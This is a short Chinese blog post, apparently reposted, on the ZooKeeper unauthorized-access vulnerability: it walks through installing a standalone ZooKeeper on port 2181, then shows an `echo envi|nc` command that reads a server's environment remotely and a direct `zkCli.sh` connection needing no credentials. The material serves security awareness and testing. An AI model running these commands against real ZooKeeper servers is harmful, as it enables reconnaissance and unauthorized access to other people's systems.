首页 > 其他 > 详细

ZooKeeper 未授权访问漏洞

时间:2018-01-30 14:27:03      阅读:413      评论:0      收藏:0      [点我收藏+]

 

ZooKeeper 安装:

Zookeeper的默认开放端口是2181

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz

tar -zxvf zookeepre-3.4.10.tar.gz
cd zookeeper-3.4.10/
cd conf/
vi zoo.cfg
###配置单机模式
tickTime=2000    
dataDir=/tmp/zookeeper/data    
dataLogDir=/tmp/zookeeper/logs    
clientPort=2181 

bin/zkServer.sh start   //启动
#启动client连接server
bin/zkCli.sh -server localhost:2181 

漏洞验证:

执行以下命令即可远程获取该服务器的环境:

echo envi|nc 192.168.15.74 2181

技术分享图片

直接连接:
./zkCli.sh -server ip:port

技术分享图片

 

 

 

 

 

参考链接:

Zookeeper 安装和配置

http://coolxing.iteye.com/blog/1871009

ZooKeeper 未授权访问漏洞

原文:https://www.cnblogs.com/xiaozi/p/8277968.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!